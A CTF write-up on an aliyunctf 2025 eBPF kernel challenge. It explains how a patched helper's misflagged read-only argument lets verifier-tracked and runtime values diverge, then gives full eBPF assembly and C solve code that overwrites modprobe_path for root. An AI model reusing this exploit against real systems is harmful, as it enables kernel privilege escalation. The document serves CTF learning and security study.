This past weekend I played aliyunctf 2025 with the Friendly Maltese Citizens. There was a fun eBPF kernel pwn challenge that I spent far too long stuck on because I failed to realize one small detail (but still managed to get second blood :P).
# background on bpf
NOTE: any references to files or structures in the Linux kernel are based on Linux v6.6.
What is BPF? BPF stands for Berkeley Packet Filter and is a virtual instruction set used to execute small programs in the kernel. There are two flavors of BPF in the kernel: cBPF and eBPF. Classic Berkeley Packet Filter (cBPF) is a 32 bit instruction set: each register and all instructions are 32 bits wide, and it is mostly used to write seccomp syscall filters. Extended Berkeley Packet Filter (eBPF) is a 64 bit instruction set and is more widely used. eBPF is used to write programs that perform socket filtering, network filtering, kernel probes, and more. The full list of program types can be found here: https://docs.ebpf.io/linux/program-type/.
eBPF is more powerful than cBPF, with persistent program storage, kernel helper functions, the ability to directly call kernel functions, and more. Given full access to all of that functionality, eBPF would be entirely capable of launching a kernel privilege escalation attack. For this reason eBPF is quite locked down for unprivileged users. The sysctl kernel.unprivileged_bpf_disabled controls whether unprivileged users are allowed to load eBPF programs at all, and it is enabled on most major Linux distros. Furthermore, users without the CAP_BPF capability are unable to access the full range of eBPF helpers and are disallowed from calling kernel functions.
static const struct bpf_verifier_ops * const bpf_verifier_ops[] = {
#define BPF_PROG_TYPE(_id, _name, prog_ctx_type, kern_ctx_type) \
[_id] = & _name ## _verifier_ops,
#define BPF_MAP_TYPE(_id, _ops)
#define BPF_LINK_TYPE(_id, _name)
#include <linux/bpf_types.h>
#undef BPF_PROG_TYPE
#undef BPF_MAP_TYPE
#undef BPF_LINK_TYPE
};
eBPF helper resolution is performed based on the type of the loaded eBPF program. This snippet of code in kernel/bpf/verifier.c generates an array mapping each eBPF program type to its bpf_verifier_ops, whose get_func_proto callback resolves helper calls. For example, the entry below in bpf_types.h maps a program of type BPF_PROG_TYPE_SOCKET_FILTER to sk_filter_verifier_ops, and thus to sk_filter_func_proto.
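The entry, quoted from include/linux/bpf_types.h:
BPF_PROG_TYPE(BPF_PROG_TYPE_SOCKET_FILTER, sk_filter,
	      struct __sk_buff, struct sk_buff)
And sk_filter_func_proto itself: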
static const struct bpf_func_proto *
sk_filter_func_proto(enum bpf_func_id func_id, const struct bpf_prog *prog)
{
switch (func_id) {
case BPF_FUNC_skb_load_bytes:
return &bpf_skb_load_bytes_proto;
case BPF_FUNC_skb_load_bytes_relative:
return &bpf_skb_load_bytes_relative_proto;
case BPF_FUNC_get_socket_cookie:
return &bpf_get_socket_cookie_proto;
case BPF_FUNC_get_socket_uid:
return &bpf_get_socket_uid_proto;
case BPF_FUNC_perf_event_output:
return &bpf_skb_event_output_proto;
default:
return bpf_sk_base_func_proto(func_id);
}
}
# eBPF maps
eBPF maps are a storage mechanism provided by the Linux kernel to persist information between runs of an eBPF program, to share state between different programs, and to share data from userspace for a program to access. The full list of eBPF map types can be found at https://docs.ebpf.io/linux/map-type/.
# compiling eBPF programs
There are three ways that I currently know of to generate eBPF programs; the method I chose for this challenge was to write eBPF assembly and assemble it to bytecode using Zig. The Zig backend for eBPF currently uses LLVM, which defaults to a dialect of eBPF assembly known as pseudoc. Below is an example of a small eBPF program that looks up a value in the map referenced by fd 10 using the key 0.
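A minimal sketch in that pseudoc dialect, following the same conventions as the solve script at the end of this post (helper 1 is BPF_FUNC_map_lookup_elem; the mptr macro is explained in a later section):
.macro mptr reg, fd
	ld_pseudo \reg, 1, \fd
.endm
_start:
	// r1 = map ptr for the map behind fd 10
	mptr r1, 10
	// r2 = pointer to an 8 byte stack slot holding the key (0)
	r2 = r10
	r2 += -8
	*(u64 *)(r2 + 0) = 0
	// r0 = bpf_map_lookup_elem(map, key); NULL if the key is absent
	call 1
	if r0 == 0 goto miss
	// r0 now points into the map value
	r0 = *(u64 *)(r0 + 0)
miss:
	exit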
The eBPF target is bpfel-freestanding-none; once compiled into an ELF object, the bytecode can be extracted with objcopy, and xxd -i converts the resulting binary into an array of bytes that can be included in a C file with the #include directive.
# eBPF map pointers
Inside of an eBPF program, maps are referenced by special pointer types called map ptrs. Map ptrs are loaded into registers using a variant of the ld64 instruction. Normally ld64 loads a 64 bit immediate into a register, but if the src field of the ld64 instruction is set to 1, the kernel instead interprets the immediate as a file descriptor and loads a reference to the corresponding map. This can be accomplished in assembly with:
ld_pseudo [reg], 1, [fd]
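Equivalently, in raw struct bpf_insn form (a sketch using the uapi constants; note that ld64 occupies two instruction slots):
// first slot: opcode, dst reg, src = BPF_PSEUDO_MAP_FD (1), imm = the map fd
// second slot: continuation holding the upper 32 bits of the immediate
struct bpf_insn ld_map_fd[2] = {
	{ .code = BPF_LD | BPF_DW | BPF_IMM, .dst_reg = BPF_REG_1,
	  .src_reg = BPF_PSEUDO_MAP_FD, .imm = 3 /* map fd */ },
	{ 0 },
};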
# calling eBPF helpers
By default, call instructions are interpreted as requests for eBPF helpers. The immediate field of the call instruction determines which helper to invoke; for example, call 1 invokes BPF_FUNC_map_lookup_elem. The full list of eBPF helpers can be found in enum bpf_func_id in <linux/bpf.h>.
# other call variants
There are two other types of call instructions, distinguished by the value of the src field: subprogram calls use src = 1 and kernel function (kfunc) calls use src = 2. To my knowledge there is no assembly variant of the call instruction that allows control of the src field, but a macro can be used to encode the src field directly, as sketched below.
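A sketch of such a macro, based on the bpf_insn layout (one opcode byte, a regs byte with src in the high nibble, a 16 bit offset, and a 32 bit immediate); the call_src mnemonic is my own invention:
.macro call_src src, imm
	.byte 0x85          // BPF_JMP | BPF_CALL
	.byte (\src << 4)   // src_reg selects the call variant
	.short 0
	.long \imm
.endm
// call_src 1, off -> subprogram call (imm = instruction offset)
// call_src 2, id  -> kfunc call (imm = BTF id of the kernel function)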
The different processing of the call variants can be found at kernel/bpf/verifier.c:16655.
# JIT compilation
eBPF has two modes of execution: interpreted and JIT compiled. JIT compilation is controlled by a set of kernel config options (CONFIG_BPF_JIT, CONFIG_BPF_JIT_ALWAYS_ON, CONFIG_BPF_JIT_DEFAULT_ON). With CONFIG_BPF_JIT_ALWAYS_ON set, eBPF programs are always JIT compiled by the kernel. The program is JIT compiled by the function bpf_int_jit_compile in kernel/bpf/core.c.
void bpf_prog_jit_attempt_done(struct bpf_prog *prog)
It is possible to dump the JIT compiled program by setting a breakpoint at bpf_prog_jit_attempt_done and dumping the instructions at fp->bpf_func (or $rdi+0x30 on x86_64).
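For example, in a gdb session attached to the challenge VM (a sketch; 0x30 is the offset of bpf_func in struct bpf_prog on this build):
(gdb) break bpf_prog_jit_attempt_done
(gdb) continue
(gdb) # on entry, $rdi holds the struct bpf_prog pointer
(gdb) x/64i *(long *)($rdi + 0x30)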
# challenge exploration
The challenge involves a patch to Linux v6.6.74 that adds a new eBPF helper function:
diff --color -ruN origin/include/linux/bpf.h aliyunctf/include/linux/bpf.h
--- origin/include/linux/bpf.h 2025-01-23 10:21:19.000000000 -0600
+++ aliyunctf/include/linux/bpf.h 2025-01-24 03:44:01.494468038 -0600
@@ -3058,6 +3058,7 @@
extern const struct bpf_func_proto bpf_user_ringbuf_drain_proto;
extern const struct bpf_func_proto bpf_cgrp_storage_get_proto;
extern const struct bpf_func_proto bpf_cgrp_storage_delete_proto;
+extern const struct bpf_func_proto bpf_aliyunctf_xor_proto;
const struct bpf_func_proto *tracing_prog_func_proto(
enum bpf_func_id func_id, const struct bpf_prog *prog);
diff --color -ruN origin/include/uapi/linux/bpf.h aliyunctf/include/uapi/linux/bpf.h
--- origin/include/uapi/linux/bpf.h 2025-01-23 10:21:19.000000000 -0600
+++ aliyunctf/include/uapi/linux/bpf.h 2025-01-24 03:44:11.814636836 -0600
@@ -5881,6 +5881,7 @@
FN(user_ringbuf_drain, 209, ##ctx) \
FN(cgrp_storage_get, 210, ##ctx) \
FN(cgrp_storage_delete, 211, ##ctx) \
+ FN(aliyunctf_xor, 212, ##ctx) \
/* */
/* backwards-compatibility macros for users of __BPF_FUNC_MAPPER that don't
diff --color -ruN origin/kernel/bpf/helpers.c aliyunctf/kernel/bpf/helpers.c
--- origin/kernel/bpf/helpers.c 2025-01-23 10:21:19.000000000 -0600
+++ aliyunctf/kernel/bpf/helpers.c 2025-01-24 03:44:06.683490095 -0600
@@ -1745,6 +1745,28 @@
.arg3_type = ARG_CONST_ALLOC_SIZE_OR_ZERO,
};
+BPF_CALL_3(bpf_aliyunctf_xor, const char *, buf, size_t, buf_len, s64 *, res) {
+ s64 _res = 2025;
+
+ if (buf_len != sizeof(s64))
+ return -EINVAL;
+
+ _res ^= *(s64 *)buf;
+ *res = _res;
+
+ return 0;
+}
+
+const struct bpf_func_proto bpf_aliyunctf_xor_proto = {
+ .func = bpf_aliyunctf_xor,
+ .gpl_only = false,
+ .ret_type = RET_INTEGER,
+ .arg1_type = ARG_PTR_TO_MEM | MEM_RDONLY,
+ .arg2_type = ARG_CONST_SIZE,
+ .arg3_type = ARG_PTR_TO_FIXED_SIZE_MEM | MEM_UNINIT | MEM_ALIGNED | MEM_RDONLY,
+ .arg3_size = sizeof(s64),
+};
+
const struct bpf_func_proto bpf_get_current_task_proto __weak;
const struct bpf_func_proto bpf_get_current_task_btf_proto __weak;
const struct bpf_func_proto bpf_probe_read_user_proto __weak;
@@ -1801,6 +1823,8 @@
return &bpf_strtol_proto;
case BPF_FUNC_strtoul:
return &bpf_strtoul_proto;
+ case BPF_FUNC_aliyunctf_xor:
+ return &bpf_aliyunctf_xor_proto;
default:
break;
}
This patch adds an extra eBPF helper function. The helper itself is simple: it takes an 8 byte buffer, xors it with 2025, and writes the result to a separate 8 byte memory location. The interesting part of this patch is that the result argument is marked MEM_RDONLY, even though the helper writes to it.
I won't talk about the eBPF verifier too much here; manf's writeup and the Google blog post discussed below are good background reading.
Since the values inside a readonly map can't change, the verifier can assume that a register loaded from a readonly map holds exactly the value stored in the map. But because the bpf_aliyunctf_xor helper is allowed to modify read-only memory, we can break that assumption: we can trick the verifier into thinking a value is some number X when it is actually Y.
static bool bpf_map_is_rdonly(const struct bpf_map *map)
{
/* A map is considered read-only if the following condition are true:
*
* 1) BPF program side cannot change any of the map content. The
* BPF_F_RDONLY_PROG flag is throughout the lifetime of a map
* and was set at map creation time.
* 2) The map value(s) have been initialized from user space by a
* loader and then "frozen", such that no new map update/delete
* operations from syscall side are possible for the rest of
* the map's lifetime from that point onwards.
* 3) Any parallel/pending map update/delete operations from syscall
* side have been completed. Only after that point, it's safe to
* assume that map value(s) are immutable.
*/
return (map->map_flags & BPF_F_RDONLY_PROG) &&
READ_ONCE(map->frozen) &&
!bpf_map_write_active(map);
}
Something to note: in order to create a readonly BPF map, the BPF_F_RDONLY_PROG flag must be set at map creation time. BPF_F_RDONLY_PROG disallows the eBPF program from modifying the map, but the userland program can still modify it, so the kernel can't consider the map readonly yet. Once the map is populated with values from userland, it can be frozen using BPF_MAP_FREEZE to disallow further modification from the syscall side. Only then is the map considered readonly, and the verifier can perform constant optimization, as in the sketch below.
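A sketch of that sequence, using the syscall wrappers from the solve script below:
// create the map with BPF_F_RDONLY_PROG: programs can never write to it
int map_fd = try(bpf_create_rdonly_map(BPF_MAP_TYPE_ARRAY, 4, 8, 1));
// populate it from userland while the syscall side is still writable
int key = 0;
long value = 0;
try(bpf_update_elem(map_fd, &key, &value, 0));
// freeze it: no further syscall-side updates, so bpf_map_is_rdonly() becomes
// true and the verifier may treat loads from the map as constants
try(bpf_map_freeze(map_fd));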
I probably spent at least 12 hours trying to figure out why the verifier wasn't doing constant optimization only to realize that I hadn't frozen the map.
In manf's writeup, they abuse map ptrs to achieve out-of-bounds read/write and eventually privilege escalation. But from my testing, this no longer works in modern versions of Linux; the verifier and JIT compiler now treat operations on map ptrs differently. If a register holding a known constant is added to a map ptr, the compiler emits a sequence of instructions that adds that constant directly instead of using the register. So if the verifier knows a register holds the value X, it emits assembly that simply adds the constant X to the map ptr, even though at runtime the register would hold a different value.
The Google blog post takes a different approach. When not operating on map ptrs, the compiler does not fold a register's known-constant value into an immediate; the emitted code still uses the register, whose runtime value may differ from what the verifier tracked. This can be abused in combination with eBPF helpers:
// Put a ptr to skb (network packet) in r1
r1 = ptr_to_packet
// Set offset = 0
r2 = 0
// Set to = stack_ptr - 40
r3 = r10 - 40
// Verifier thinks len = 0, in reality len = 8.
r4 = r6
// len = len + 8, verifier thinks len = 8 so it deems it safe, in reality len = 16
r4 += 8
// Set start_header = 1
r5 = 1
// assuming r8 holds a pointer to memory
*(u64 *)(r3 + 8) = r8
// BPF_FUNC_skb_load_bytes_relative(r1=skb, r2=offset, r3=to, r4=len, r5=start_header)
call 68
Here we trick the verifier into thinking a value is 0 during verification when at runtime it is 8 (verif=0, runtime=8). Adding 8 yields (verif=8, runtime=16). This corrupted length is passed to skb_load_bytes_relative, which reads data from a network packet that we control. The verifier thinks skb_load_bytes_relative writes to r3+0 through r3+8 when it really writes to r3+0 through r3+16, corrupting the pointer stored at r3+8. That pointer now holds an arbitrary attacker-controlled value, yet the verifier still considers it safe to use. Since KASLR is turned off, we simply overwrite modprobe_path for privilege escalation and read the flag.
# solve scripts
build:
mkdir -p zig-out
zig cc probe.S -target bpfel-freestanding-none -c -o zig-out/probe.o
objcopy -O binary zig-out/probe.o zig-out/probe.bin
xxd -i zig-out/probe.bin > probe.h
zig cc test.c -target x86_64-linux-musl -static -o teemo -Os -s -no-pie
cp teemo rootfs/bin/teemo
chmod +x rootfs/bin/teemo
pwnc kernel compress
llvm-objdump -d zig-out/probe.o
probe.S:
#define XOR 212
#define MAP_LOOKUP_ELEM 1
#define SKC_TO_UNIX 178
#define DYNPTR_FROM_MEM 197
#define THIS_CPU 154
#define STRTOL 105
#define LOAD_RELATIVE 68
#define RDONLY_MAP 3
#define fp r10
.macro mptr reg, fd
ld_pseudo \reg, 1, \fd
.endm
_start:
	// r9 = ctx (struct __sk_buff *)
	r9 = r1
	// r7 = pointer to the value in the frozen readonly map (fd 3)
	mptr r1, 3
	r2 = fp
	r2 += -8
	*(u64 *)(r2 + 0) = 0
	call MAP_LOOKUP_ELEM
	if r0 == 0 goto done1
	r7 = r0
	// r8 = pointer to the value in the large scratch map (fd 4)
	mptr r1, 4
	r2 = fp
	r2 += -8
	*(u64 *)(r2 + 0) = 0
	call MAP_LOOKUP_ELEM
	if r0 == 0 goto done1
	r8 = r0
	// xor(buf = fp-16 holding 8 ^ 2025, buf_len = 8, res = r7): writes 8 into
	// the "readonly" slot while the verifier still tracks it as the constant 0
	r1 = *(u64 *)(r7 + 0)
	r3 = r7
	r2 = 8
	r1 = fp
	r1 += -16
	*(u64 *)(r1 + 0) = 8 ^ 2025
	call XOR
	// len = *(r7) + 8: verifier thinks 0 + 8 = 8, at runtime it is 8 + 8 = 16
	r5 = 1
	r4 = *(u64 *)(r7 + 0)
	r4 += 8
	// to = fp-16; park the scratch map ptr at fp-8, just past the 8 bytes the
	// verifier believes will be written
	r3 = fp
	r3 += -16
	*(u64 *)(r3 + 8) = r8
	r2 = 0
	r1 = r9
	// copies 16 packet bytes to fp-16, clobbering the map ptr at fp-8
	call LOAD_RELATIVE
	// verifier: r8 is still a map value ptr; runtime: the modprobe_path
	// address taken from the packet
	r8 = *(u64 *)(fp - 8)
	r1 = 0x782f706d742f ll // "/tmp/x"
	*(u64 *)(r8 + 0) = r1
	r0 = 13
	exit
done1:
	r0 = 1
	exit
test.c:
#define _GNU_SOURCE
#include "bpf_insn.h"
// #include <bpf/bpf.h>
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <poll.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>
#define try(expr) \
({ \
int _i = (expr); \
if (0 > _i) { \
errx(1, "error at %s:%d: returned %d, %s\n", __FILE__, __LINE__, \
_i, strerror(errno)); \
} \
_i; \
})
#define warn(expr) \
({ \
int _i = (expr); \
if (0 > _i) { \
printf("pwn: error at %s:%d: returned %d, %s\n", __FILE__, \
__LINE__, _i, strerror(errno)); \
} \
_i; \
})
#define BPF_LOG_BUF_SIZE (UINT32_MAX >> 8)
char bpf_log_buf[BPF_LOG_BUF_SIZE];
static int bpf_program_load(enum bpf_prog_type prog_type,
const struct bpf_insn *insns, int prog_len,
const char *license, int kern_version) {
union bpf_attr attr = {
.prog_type = prog_type,
.insns = (uint64_t)insns,
.insn_cnt = prog_len / sizeof(struct bpf_insn),
.license = (uint64_t)license,
.log_buf = (uint64_t)bpf_log_buf,
.log_size = BPF_LOG_BUF_SIZE,
.log_level = 10,
};
attr.kern_version = kern_version;
bpf_log_buf[0] = 0;
return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}
static int bpf_create_map(enum bpf_map_type map_type, int key_size,
int value_size, int max_entries) {
union bpf_attr attr = {.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries};
return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
static int bpf_create_rdonly_map(enum bpf_map_type map_type, int key_size,
int value_size, int max_entries) {
union bpf_attr attr = {.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
.map_flags = BPF_F_RDONLY_PROG};
return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}
static int bpf_update_elem(int fd, void *key, void *value, uint64_t flags) {
union bpf_attr attr = {
.map_fd = fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
.flags = flags,
};
return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}
static int bpf_lookup_elem(int fd, void *key, void *value) {
union bpf_attr attr = {
.map_fd = fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
};
return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}
static int bpf_map_freeze(int fd) {
union bpf_attr attr;
memset((void *)&attr, 0, sizeof(attr));
attr.map_fd = fd;
return syscall(__NR_bpf, BPF_MAP_FREEZE, &attr, sizeof(attr));
}
#include "probe.h"
int main() {
  // create the readonly bpf map (fd 3 at runtime, hardcoded in probe.S)
  int map_fd = try(bpf_create_rdonly_map(BPF_MAP_TYPE_ARRAY, 4, 8, 1));
  printf("map_fd = %d\n", map_fd);
  // create the large scratch map (fd 4 at runtime)
  char other_val[4000];
  memset(&other_val, 0, sizeof(other_val));
  int other = try(bpf_create_map(BPF_MAP_TYPE_ARRAY, 4, sizeof(other_val), 1));
  printf("other_fd = %d\n", other);
  // populate the readonly map, then freeze it so the verifier can treat its
  // contents as constant
  int key = 0;
  long value = 0;
  try(bpf_update_elem(map_fd, &key, &value, 0));
  try(bpf_map_freeze(map_fd));
  // fill the scratch map with zeroes
  try(bpf_update_elem(other, &key, &other_val, 0));
struct bpf_insn *exploit = (struct bpf_insn *)&zig_out_probe_bin;
int exploit_len = zig_out_probe_bin_len;
int progfd = bpf_program_load(BPF_PROG_TYPE_SOCKET_FILTER, exploit,
exploit_len, "", 0);
printf("log = %s\n", bpf_log_buf);
printf("progfd = %d\n", progfd);
  int sockets[2];
  try(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets));
  // attach the filter; it runs on every packet sent to sockets[1]
  try(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd,
                 sizeof(progfd)));
  long buffer[4];
  // packet bytes 8..16 land at fp-8 in the program: the address of
  // modprobe_path in the challenge kernel (KASLR is off)
  buffer[1] = 0xffffffff82b3f6c0;
  ssize_t n = write(sockets[0], buffer, sizeof(buffer));
  printf("written = %ld\n", n);
  n = read(sockets[1], buffer, sizeof(buffer));
  printf("read = %ld\n", n);
  // modprobe_path now points at /tmp/x; make it a script that copies the flag
  int fd = open("/tmp/x", O_CREAT | O_RDWR, 0777);
  char payload[] = "#!/bin/sh\ncp /flag /tmp/flag\nchmod 777 /tmp/flag\n";
  write(fd, &payload, sizeof(payload));
  close(fd);
  // /tmp/t starts with NUL bytes: an unknown binary format, so executing it
  // makes the kernel invoke modprobe_path (now /tmp/x) as root
  fd = open("/tmp/t", O_CREAT | O_RDWR, 0777);
  long nulls[1];
  memset(&nulls, 0, sizeof(nulls));
  write(fd, &nulls, sizeof(nulls));
  close(fd);
  system("/tmp/t");
return 0;
}